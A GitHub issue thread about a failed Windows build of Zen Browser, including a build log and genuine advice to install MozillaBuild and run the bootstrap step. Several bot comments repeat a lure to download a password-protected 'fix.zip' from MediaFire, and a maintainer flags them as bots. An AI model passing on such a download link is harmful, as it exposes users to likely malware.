### ISSUE TITLE
[Windows] Unable to build project.

### ISSUE THREAD

**Issue by smultar** [zen-browser/desktop#722]
### What happened?

While following the instructions provided in the README, I noticed that some prerequisites were not mentioned. Specifically, the requirements for `python3`, `7zip`, and an environment variable for `MOZILLABUILD` were omitted. As a result, I am currently unable to compile the project or contribute any fixes.

![image](https://github.com/user-attachments/assets/a3e8bfce-3fcc-4e5c-8f1d-1b7973c3811e)

I'm trying to build on **Window 11.**

### Reproducible?

- [X] I have checked that this issue cannot be reproduced on Mozilla Firefox.

### Version

development

### Severity impact

Medium

### What platform are you seeing the problem on?

Windows

### Relevant log output

```shell
PS C:\Users\jason> cd .\Documents\GitHub\browser\
PS C:\Users\jason\Documents\GitHub\browser> npm run build

> zen-core@1.0.0 build
> surfer build

00:00:00 Applying mozconfig...
00:00:00 Dynamic config 'brand not set, defaulting to 'unofficial'
00:00:00 Dynamic config 'buildMode not set, defaulting to 'dev'
00:00:00 Dynamic config 'buildMode not set, defaulting to 'dev'
00:00:00 Building config based on a dev mode
00:00:00 Config for this `windows` build:
00:00:00        --with-app-name=zen
00:00:00        --with-app-basename=Zen
00:00:00        --enable-official-branding
00:00:00        --with-l10n-base="$PWD/browser/locales"
00:00:00        MOZ_USER_DIR="Zen Browser"
00:00:00        MOZ_APP_BASENAME=Zen
00:00:00        MOZ_APP_PROFILE=zen
00:00:00        MOZ_APP_DISPLAYNAME="Zen Browser"
00:00:00        MOZ_BRANDING_DIRECTORY=branding/unofficial
00:00:00        MOZ_OFFICIAL_BRANDING_DIRECTORY=branding/unofficial
00:00:00        MOZ_DISTRIBUTION_ID=com.zen.browser
00:00:00        MOZ_SOURCE_REPO=https://github.com/zen-browser/desktop
00:00:00        MOZ_SOURCE_CHANGESET=4cef2dd30440b95644736a3d3c395eede759fc6b
00:00:00        --enable-application=browser
00:00:00        --enable-unverified-updates
00:00:00        --enable-raw
00:00:00        --enable-webrtc
00:00:00        --enable-jxl
00:00:00        --enable-av1
00:00:00        --enable-eme=widevine
00:00:00        --allow-addon-sideload
00:00:00        --with-unsigned-addon-scopes=app,system
00:00:00        MOZ_DATA_REPORTING=0
00:00:00        MOZ_SERVICES_HEALTHREPORT=0
00:00:00        MOZ_TELEMETRY_REPORTING=0
00:00:00        MOZ_REQUIRE_SIGNING=
00:00:00        MOZ_REQUIRE_SIGNING=
00:00:00        --target=x86_64-pc-windows-msvc
00:00:00        --disable-maintenance-service
00:00:00        --disable-bits-download
00:00:00        POLLY="-mllvm -polly -mllvm -polly-2nd-level-tiling -mllvm -polly-loopfusion-greedy -mllvm -polly-pattern-matching-based-opts -mllvm -polly-position=before-vectorizer -mllvm -polly-vectorizer=stripmine"
00:00:00        VERBOSE=1
00:00:00        --disable-debug
00:00:00        --with-branding=browser/branding/unofficial
00:00:00        --enable-unverified-updates
00:00:00        --enable-update-channel=unofficial
00:00:00        MOZ_APPUPDATE_HOST=zen-updates.vercel.app
00:00:00 Starting build...
00:00:00 Building for "windows"...
 WARNING If you get any dependency errors, try running |surfer bootstrap|.
00:00:00 Traceback (most recent call last):
00:00:00   File "C:\Users\jason\Documents\GitHub\browser\engine\mach", line 199, in <module>
00:00:00     main(sys.argv[1:])
00:00:00   File "C:\Users\jason\Documents\GitHub\browser\engine\mach", line 155, in main
00:00:00     mach = check_and_get_mach(os.path.dirname(os.path.realpath(__file__)), args)
00:00:00            ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
00:00:00   File "C:\Users\jason\Documents\GitHub\browser\engine\mach", line 39, in check_and_get_mach
00:00:00     return load_mach(dir_path, mach_path, args)
00:00:00            ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
00:00:00   File "C:\Users\jason\Documents\GitHub\browser\engine\mach", line 25, in load_mach
00:00:00     return mach_initialize.initialize(dir_path, args)
00:00:00            ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
00:00:00   File "C:\Users\jason\Documents\GitHub\browser\engine\build/mach_initialize.py", line 157, in initialize
00:00:00     _maybe_activate_mozillabuild_environment()
00:00:00   File "C:\Users\jason\Documents\GitHub\browser\engine\build/mach_initialize.py", line 91, in _maybe_activate_mozillabuild_environment
00:00:00     assert mozillabuild.exists(), (
00:00:00 AssertionError: MozillaBuild was not found at "C:\mozilla-build".
00:00:00 If it's installed in a different location, please set the "MOZILLABUILD" environment variable accordingly.
```

**Comment by llowvxe** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by GendiAstaNugraha** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by GendiAstaNugraha** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by smultar** [comment]
I apologize, @GendiAstaNugraha and @llowvxe, but I do not have the means to verify the credentials or credibility of your proposed solution.

**Comment by pilot5657** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by mauro-balades** [comment]
Don't download it, they are bots 👍

**Comment by ch4og** [comment]
Are you sure you have MozillaBuild installed?

Link to it can be found on Building Firefox on Windows from official Mozilla documentation
(https://firefox-source-docs.mozilla.org/setup/windows_build.html)

**Comment by mauro-balades** [comment]
you need to run `npm run bootstrap` too

**Comment by smultar** [comment]
The bot accounts have been deleted/banned from GitHub. I reported them earlier.

Is anyone allowed to contribute to the readme of the project @mauro-balades

**Comment by mauro-balades** [comment]
Everyone is, PRs are always welcome!
